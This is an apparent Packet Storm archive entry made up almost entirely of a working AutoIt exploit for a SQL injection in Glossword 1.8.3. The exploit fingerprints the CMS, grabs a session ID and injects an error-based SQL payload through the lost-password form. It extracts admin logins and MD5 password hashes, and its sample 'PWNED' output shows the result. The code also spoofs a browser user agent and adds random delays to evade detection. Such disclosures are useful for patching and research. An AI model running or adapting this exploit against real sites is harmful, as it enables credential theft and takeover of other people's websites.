Glossword 1.8.3 SQL Injection

2013-02-03T00:00:00
ID PACKETSTORM:120044
Type packetstorm
Reporter Akastep
Modified 2013-02-03T00:00:00

Description

                                        
                                            `#cs  
==============================================================  
Vulnerable Software: Glossword 1.8.3  
Official site: http://sourceforge.net/projects/glossword/  
Download: http://sourceforge.net/projects/glossword/files/glossword/1.8.3/  
Vuln: SQLi  
==================THIS IS A WHOLE EXPLOIT=====================  
Exploit Coded In AutoIT.  
To exploit this vulnerability magic_quotes_gpc must be turned off on server side.  
Print screen: http://s004.radikal.ru/i206/1302/89/d7398ade1cd7.png  
POC video: http://youtu.be/55IaNTQS3Fk  
  
Exploit usage:  
  
C:\0day>glossa.exe http://hacker1.own /glossword/glossword/ 2  
  
  
##############################################################  
# Glossword 1.8.3 SQL injection Exploit #  
# Usage: glossa.exe http://site.tld /installdir/ UID (int) #  
# DON'T HATE THE HACKER, HATE YOUR OWN CODE! #  
# VULN/Exploit: AkaStep & HERO_AZE #  
##############################################################  
  
##############################################################  
[*] SENDING FAKE SESSUID: ea0f5d8c7c2c8a2f9f7c3b3e5a3d4f5d [*]  
##############################################################  
  
##############################################################  
[*] CMS is GLOSSWORD! [*]  
##############################################################  
  
##############################################################  
[*] FETCHING VALID SESSUID [*]  
##############################################################  
  
##############################################################  
[*] Got VALID SESSUID: aa0e680bef2679932393abe72b78ef03 [*]  
##############################################################  
  
##############################################################  
[*] !~ P*W*N*E*D ~! [*]  
--------------------------------------------------------------  
[*] Login: admin [*]  
--------------------------------------------------------------  
[*] Password: (MD5) 260efaff0cac0f78a53ccc540e89e72d [*]  
--------------------------------------------------------------  
Admin Panel: hacker1.own/glossword/glossword/gw_admin/login.php  
--------------------------------------------------------------  
[*] Good Luck;) [*]  
##############################################################  
[*] DONE [*]  
##############################################################  
  
  
  
  
#ce  
  
  
#NoTrayIcon  
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****  
#AutoIt3Wrapper_Outfile=glossa.exe  
#AutoIt3Wrapper_UseUpx=n  
#AutoIt3Wrapper_Change2CUI=y  
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****  
#include "WinHttp.au3"  
#include <inet.au3>  
#include <String.au3>  
  
$triptrop=@CRLF & _StringRepeat('#',62) & @CRLF;  
$exploitname=@CRLF & _StringRepeat('#',62) & @CRLF & _  
'#' & _StringRepeat(' ',11) & 'Glossword 1.8.3 SQL injection Exploit ' & _StringRepeat(' ',11) & '#' & @CRLF & _  
'# Usage: ' & @ScriptName & ' http://site.tld ' & ' /installdir/ ' & ' UID (int) #' & _  
@CRLF & "# DON'T HATE THE HACKER, HATE YOUR OWN CODE! #" & @CRLF & _  
'# VULN/Exploit: AkaStep & HERO_AZE #' & @CRLF & _StringRepeat('#',62);  
ConsoleWrite(@CRLF & $exploitname & @CRLF)  
  
$method='POST';  
$vulnurl='gw_admin/login.php'  
Global $sessid=0  
$cmsindent='lossword'; # We will use it to identify CMS #;  
$adminpanel=$vulnurl  
  
;#~ Impersonate that We Are Not BOT or exploit.We are human who uses IE.# ~;  
$useragent='Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SV1; .NET CLR 1.1.4325)';  
$msg_usage="Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName & ' http://site.tld ' & ' /installdir/ ' & ' UID (int)' & @CRLF  
if $CmdLine[0] <> 3 Then  
ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);  
MsgBox(64,"",$msg_usage);  
exit;  
EndIf  
  
  
if $CmdLine[0]=3 Then  
$targetsite=$CmdLine[1];  
$installdir=$CmdLine[2];  
$uidtoattack=Number(StringMid($CmdLine[3],1,255));  
EndIf  
  
if not StringIsDigit($uidtoattack) Then  
ConsoleWrite(' UID is wrong! Exit' );  
Exit;  
EndIf  
  
  
  
if StringStripWS($targetsite,8)='' OR StringStripWS($installdir,8)='' Then  
ConsoleWrite('Are you kidding meeeeen?');  
Exit;  
EndIf  
  
  
HttpSetUserAgent($useragent)  
$doublecheck=InetGet($targetsite,'',1);  
if @error Then  
ConsoleWrite('[*] Incorrect Domain Name/Or you are Offline! [*]' & @CRLF)  
Exit;  
EndIf  
  
  
  
sleep(Random(1200,2500,1));  
  
sendfakeretrivevalidsess($targetsite,$installdir)  
  
HttpSetUserAgent($useragent);  
$sidentify=_INetGetSource($targetsite & $adminpanel,True);  
  
Func exploit($targetsite,$installdir,$sessid)  
Global $sAddress = $targetsite  
Global $PAYLOADTOSEND ="arPost[user_name]=') AND (select floor(rand(0)*2) from(select count(*)," & _  
"concat((select concat(0x3C73696B6469723E,login,0x7c,password,0x3C2F73696B6469723E,0x7c) from " & _  
"gw_auth where id_auth=" & $uidtoattack & "),floor(rand(0)*2))x from information_schema.tables group by x)a)-- " & _  
" AND 1=('1&arPost[user_email]=trueownage&a=lostpass&sid=" & $sessid & "&post=Send password";  
Global $sDomain = $targetsite  
Global $sPage = $installdir & $vulnurl  
Global $sAdditionalData = $PAYLOADTOSEND  
Global $hOpen = _WinHttpOpen($useragent)  
Global $hConnect = _WinHttpConnect($hOpen, $sDomain)  
Global $hRequest = _WinHttpOpenRequest($hConnect, "POST", $sPage, -1, -1, -1, '')  
_WinHttpSendRequest($hRequest, "Content-Type: application/x-www-form-urlencoded", $sAdditionalData)  
_WinHttpReceiveResponse($hRequest)  
Global $sReturned  
If _WinHttpQueryDataAvailable($hRequest) Then  
Do  
$sReturned &= _WinHttpReadData($hRequest)  
Until @error  
  
if StringInStr($sReturned,'<sikdir>') and StringInStr($sReturned,'</sikdir>') Then  
  
$zsuxxv = StringRegExp($sReturned, '<(?i)sikdir>(.*?)</(?i)sikdir>', 1)  
For $x = 0 To UBound($zsuxxv) - 1  
Beep(100,1000);  
ConsoleWrite($triptrop & '[*] !~ P*W*N*E*D ~! [*] ' & _  
StringReplace($triptrop,'#','-') & '[*] Login: ' & StringMid($zsuxxv[$x],1,StringInStr($zsuxxv[$x],'|')-1) & _  
_StringRepeat(' ',StringLen($triptrop)-18-StringLen(StringMid($zsuxxv[$x],1,StringInStr($zsuxxv[$x],'|')-1))) & '[*]' & _  
StringReplace($triptrop,'#','-') & '[*] Password: (MD5) ' & StringReplace($zsuxxv[$x],StringMid($zsuxxv[$x],1,StringInStr($zsuxxv[$x],'|')),'') & _  
' [*] ' & _  
StringReplace($triptrop,'#','-') & _  
'Admin Panel: ' & $targetsite & $installdir &$adminpanel & ' ' & StringReplace($triptrop,'#','-') & _  
'[*] Good Luck;) [*]' & _  
$triptrop & '[*] DONE [*]' & _  
$triptrop);  
Next  
  
Else  
  
ConsoleWrite($triptrop & '[*] ' & _StringRepeat(' ',18) & ' NO SUCH UID! ' & _StringRepeat(' ',18) & _  
' [*]' & $triptrop);  
Beep(1500,1000);  
Exit  
  
  
EndIf  
EndIf  
_WinHttpCloseHandle($hRequest)  
_WinHttpCloseHandle($hConnect)  
_WinHttpCloseHandle($hOpen)  
EndFunc;=> exploit();  
  
  
Func sendfakeretrivevalidsess($targetsite,$installdir)  
  
$fakesessionID='';  
Do  
$fakesessionID&=Chr(Random(97,102,1)) & Random(0,9,1)  
until StringLen($fakesessionID)=32  
  
$fakesessionID=StringMid($fakesessionID,Random(1,32,1),1) & StringMid($fakesessionID,1,StringLen($fakesessionID)-1)  
ConsoleWrite($triptrop & '[*] SENDING FAKE SESSUID: ' & $fakesessionID & ' [*] ' & $triptrop)  
sleep(Random(1000,2500,1))  
$rtarget=$targetsite & $installdir &"gw_admin/login.php?visualtheme=gw_admin&sid=" &$fakesessionID;  
HttpSetUserAgent($useragent);  
$str=_INetGetSource($rtarget);  
if StringInStr($str,"Session does not exist.") then  
ConsoleWrite($triptrop & '[*]' & _StringRepeat(' ',18) & 'CMS is GLOSSWORD! ' & _StringRepeat(' ',19) & '[*]' & $triptrop);  
sleep(Random(1000,2500,1))  
Else  
ConsoleWrite($triptrop & '[*]' & _StringRepeat(' ',11) &'NOPE:( THIS IS NOT GLOSSWORD CMS.' &_StringRepeat(' ',12) &'[*]' & $triptrop);  
exit;  
EndIf  
$i=123  
$mystr='';  
ConsoleWrite($triptrop & '[*]' & _StringRepeat(' ',16) & 'FETCHING VALID SESSUID' & _StringRepeat(' ',17) & ' [*]' & $triptrop)  
sleep(Random(1000,2500,1))  
Do  
$i+=1;  
if $i>=4000 then ExitLoop;//Just for make sure we are not going to infinitive loop if there any error occurs.//  
$mystr&=StringMid($str,$i,1)  
until StringInStr($mystr,chr(34));  
  
  
$sessid=StringMid($mystr,StringInStr($mystr,Chr(61))+1,32)  
if not $sessid =32 Then  
ConsoleWrite($triptrop & '[*] Sorry Man! Theris an error while fetching new VALID SESSUID [*]' & $triptrop)  
exit;  
Else  
ConsoleWrite($triptrop & '[*] Got VALID SESSUID: ' & $sessid & ' [*]' & $triptrop)  
EndIf  
$targetsite=StringReplace(StringReplace($targetsite,'http://',''),'/','')  
exploit($targetsite,$installdir,$sessid)  
EndFunc;=>sendfakeretrivevalidsess();  
  
  
  
  
#cs  
  
================================================  
KUDOSSSSSSS  
================================================  
packetstormsecurity.org  
packetstormsecurity.com  
packetstormsecurity.net  
securityfocus.com  
cxsecurity.com  
security.nnov.ru  
securtiyvulns.com  
securitylab.ru  
secunia.com  
securityhome.eu  
exploitsdownload.com  
osvdb.com  
websecurity.com.ua  
1337day.com  
itsecuritysolutions.org  
  
to all Aa Team + to all Azerbaijan Black HatZ  
+ *Especially to my bro CAMOUFL4G3 *  
To All Turkish Hackers  
  
Also special thanks to: ottoman38 & HERO_AZE  
================================================  
  
/AkaStep  
  
  
#ce  
`